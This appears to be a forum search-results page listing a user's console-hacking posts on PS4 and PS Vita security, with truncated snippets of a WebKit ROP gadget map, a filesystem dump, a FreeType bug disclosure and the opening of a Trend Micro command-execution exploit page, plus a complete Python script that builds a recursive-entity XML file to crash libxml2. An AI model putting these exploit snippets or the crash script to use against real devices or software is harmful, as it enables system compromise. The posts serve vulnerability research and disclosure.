Advertising (This ad goes away for registered users. You can Login or Register)

Search found 8 matches

by dragood2
Fri Oct 14, 2016 3:08 pm
Forum: Programming and Security
Topic: PS4 4.01 Webkit Exploits ( POC , no ROP yet)
Replies: 2
Views: 15243

PS4 4.01 Webkit Exploits ( POC , no ROP yet)

This repository contains all the WebKit Vulnerabilities that affect the PS4 on version 4.01 ( Not tested on lower versions, but could be ported with enough development). Keep in mind that it's not a ROP, so it won't give you access to SysModules, Dumping, FSBrowsing and all that. It's just a Proof O...
by dragood2
Wed Sep 28, 2016 5:09 pm
Forum: Programming and Security
Topic: PS4 3.55 Full Browser FileSystem and extensive Gadget list
Replies: 3
Views: 12166

PS4 3.55 Updated and more extensive Gadget List.

gadgetMap = { 'PlayStation 4 3.55': { 'xchg rax, rsp; dec dword ptr [rax - 0x77]': new gadget(VTABLE, -0x18a353f), 'pop rcx; pop rcx': new gadget(VTABLE, -0x5e970c), 'add dword ptr [rax - 0x77], ecx': new gadget(VTABLE, -0x18c3d40), 'mov qword ptr [rdi], rax': new gadget(VTABLE, -0x2372c99), 'sysca...
by dragood2
Wed Sep 28, 2016 5:07 pm
Forum: Programming and Security
Topic: PS4 3.55 Full Browser FileSystem and extensive Gadget list
Replies: 3
Views: 12166

PS4 3.55 Full Browser FileSystem and extensive Gadget list

d /. d /.. d /dev c /dev/dipsw c /dev/dmem0 c /dev/dmem1 c /dev/dmem2 c /dev/ctty c /dev/deci_stdout c /dev/deci_stderr c /dev/deci_tty2 c /dev/deci_tty3 c /dev/deci_tty4 c /dev/deci_tty5 c /dev/deci_tty6 c /dev/deci_tty7 c /dev/deci_ttya0 c /dev/deci_ttyb0 c /dev/deci_ttyc0 c /dev/deci_stdin c /de...
by dragood2
Wed May 04, 2016 6:06 am
Forum: Programming and Security
Topic: Libxml2 (2.9.3 32bit) stack overflow, possible psvita port?
Replies: 9
Views: 12028

Re: Libxml2 exploit poc, possible ps4 port?

Script:
#!/bin/python3

f = open('repo.xml', 'w')

f.write( "<!DOCTYPE a [ ")

i = 1

while (i < 30000):
f.write ("<!ENTITY a" + str(i) + " \"&a" + str(i+1) + ";\">")
i = i+1

f.write("<!ENTITY a" + str(i+1) + " \"&a1;\">]> <bruces bogans=\"&a1;\">")

f.close()
by dragood2
Wed May 04, 2016 6:05 am
Forum: Programming and Security
Topic: Libxml2 (2.9.3 32bit) stack overflow, possible psvita port?
Replies: 9
Views: 12028

Libxml2 (2.9.3 32bit) stack overflow, possible psvita port?

Hi This is a disclosure of the following issue that was raised a week ago on the distro's mailing list. Both bugs on the gnome bugtracker are currently private and should be made public now. A couple of weeks back while working on a related bug [CVE-2016-3627] I discovered a specially created xml fi...
by dragood2
Mon Jan 11, 2016 10:53 pm
Forum: Programming and Security
Topic: Possible PS4 3.11 Out of Bound Read (Freetype 64bit exploit)
Replies: 2
Views: 11549

Possible PS4 3.11 Out of Bound Read (Freetype 64bit exploit)

Source: https://code.google.com/p/google-security-research/issues/detail?id=614 The following heap-based out-of-bounds memory read has been encountered in FreeType. It has been reproduced with the current version of freetype2 from master git branch, with a 64-bit build of the ftbench utility compile...
by dragood2
Mon Jan 11, 2016 10:49 pm
Forum: Programming and Security
Topic: PS Vita Command Execution through Trend Micro (exploit)
Replies: 3
Views: 4325

PS Vita Command Execution through Trend Micro (exploit)

<html> <head> <title>Trend Micro Exploit</title> </head> <body> <p> Sample exploit for Trend Micro . <p> <p> Command: <input id="command" value="insert command here" size="64"> <p> <a href="javascript:begin()">Click Here</a> to run the command above <p> <img src="http://reactiongifs.us/wp-content/up...

Go to advanced search